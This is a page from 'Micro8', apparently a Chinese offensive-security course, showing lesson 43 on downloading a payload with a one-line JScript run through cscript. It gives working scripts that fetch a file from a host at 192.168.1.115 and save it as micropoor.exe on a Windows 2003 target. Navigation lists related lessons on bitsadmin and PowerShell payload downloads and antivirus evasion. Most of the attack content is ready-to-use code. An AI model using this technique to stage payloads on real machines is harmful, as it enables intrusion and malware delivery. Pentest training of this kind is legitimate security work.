Micro8
专注APT攻击与防御
Search…
前言
Preface
目录
第一章:生
1-10课
11-20课
21-30课
31-40课
41-50课
第四十一课:bitsadmin一句话下载payload
第四十二课:攻击FTP服务
第四十三课:js一句话下载payload
第四十四课:ertutil一句话下载payload补充
第四十五课:解决bat一句话下载payload黑窗
第四十六课:powershell一句话下载payload
第四十七课:payload分离免杀思路
第四十八课:payload分离免杀思路第二季
第四十九课:关于Powershell对抗安全软件
第五十课:基于SqlDataSourceEnumerator发现内网存活主机
51-60课
61-70课
71-80课
81-90课
91-100课
第二章:老(待更新...)
第三章:病(待更新...)
Powered By GitBook
第四十三课:js一句话下载payload
windows 全版本都会默认支持 js,并且通过cscript 来调用达到下载 payload 的目的。
靶机:windows 2003

读取:

1
C:\test>cscript /nologo downfile.js http://192.168.1.115/robots.txt
Copied!

附代码:

1
var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
2
WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);
3
WinHttpReq.Send();
4
WScript.Echo(WinHttpReq.ResponseText);
Copied!

写入:

1
C:\test>cscript /nologo dowfile2.js http://192.168.1.115/robots.txt
Copied!

附代码:

1
var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
2
WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);
3
WinHttpReq.Send();
4
5
BinStream = new ActiveXObject("ADODB.Stream"); BinStream.Type = 1;
6
7
BinStream.Open(); BinStream.Write(WinHttpReq.ResponseBody);
8
BinStream.SaveToFile("micropoor.exe");
Copied!
后者的话:简单,易用,轻便。
Micropoor
Previous
第四十二课:攻击FTP服务
Next
第四十四课:ertutil一句话下载payload补充
Last modified 3yr ago
Copy link
Contents
读取:
附代码:
写入:
附代码: